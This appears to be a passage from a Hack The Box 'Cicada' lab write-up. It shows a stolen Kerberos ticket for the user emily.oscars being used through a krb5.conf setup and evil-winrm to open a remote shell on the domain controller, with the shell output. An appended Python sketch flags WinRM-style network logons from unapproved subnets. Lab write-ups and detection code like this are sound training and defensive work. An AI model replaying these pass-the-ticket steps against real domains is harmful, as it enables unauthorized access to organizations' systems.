WinRM
The emily.oscars user has been compromised and a TGT was generated for it. The user has membership in the Remote Management Users group, allowing the user to WinRM to the target system. This was enumerated from LDAPDomainDump and BloodHound.
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ echo -e '[realms]\n\n\tCICADA.HTB = {\n\t\tkdc = cicada-dc.cicada.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
CICADA.HTB = {
kdc = cicada-dc.cicada.htb
}
Setting up the /etc/krb5.conf file for pass-the-ticket
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ KRB5CCNAME=emily.oscars@cicada-dc.cicada.htb.ccache evil-winrm -r CICADA.HTB -i cicada-dc.cicada.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> hostname
CICADA-DC
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::29
IPv6 Address. . . . . . . . . . . : dead:beef::46c0:3971:5ebf:3844
Link-local IPv6 Address . . . . . : fe80::f65a:ca26:f7f6:2508%6
IPv4 Address. . . . . . . . . . . : 10.129.41.192
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:fe94:3911%6
10.129.0.1
Initial foothold established on the target system as the emily.oscars user via WinRM
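As an added defensive example (not part of the original writeup), the check below flags Security event 4624 network logons by members of Remote Management Users that originate outside an approved admin subnet, since that group membership is what enabled the WinRM foothold above. The group membership list, the approved subnet and the sample events are constructed.

```python
"""Flag WinRM-style network logons (4624, LogonType 3) by Remote
Management Users members from non-approved source hosts.
Added example; all lists and events below are constructed."""
import ipaddress

# Constructed: accounts that hold Remote Management Users membership
# (the writeup found emily.oscars in this group via LDAPDomainDump/BloodHound).
REMOTE_MGMT_USERS = {"emily.oscars"}

# Constructed: subnet from which WinRM administration is expected.
ADMIN_SOURCES = [ipaddress.ip_network("10.129.41.0/24")]

# Constructed 4624 records using the real field names from the event schema.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "emily.oscars",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.10.14.5"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "emily.oscars",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.129.41.50"},
    {"EventID": 4624, "LogonType": 2, "TargetUserName": "emily.oscars",
     "AuthenticationPackageName": "Negotiate", "IpAddress": "127.0.0.1"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "svc_backup",
     "AuthenticationPackageName": "NTLM", "IpAddress": "10.10.14.5"},
]


def is_approved_source(ip):
    """True if ip parses and falls inside an approved admin subnet."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ADMIN_SOURCES)


def flag_winrm_logon(event):
    """Return a reason string for a suspicious network logon, else None."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 3:
        return None  # only network logons, which is how WinRM shows up
    user = event.get("TargetUserName", "").lower()
    if user not in REMOTE_MGMT_USERS:
        return None  # account cannot use WinRM via this group
    src = event.get("IpAddress", "")
    if is_approved_source(src):
        return None
    return "%s network logon from non-approved source %s" % (user, src)


def run(events=SAMPLE_EVENTS):
    """Return (user, reason) pairs for every flagged event."""
    hits = []
    for e in events:
        reason = flag_winrm_logon(e)
        if reason:
            hits.append((e["TargetUserName"], reason))
    return hits
```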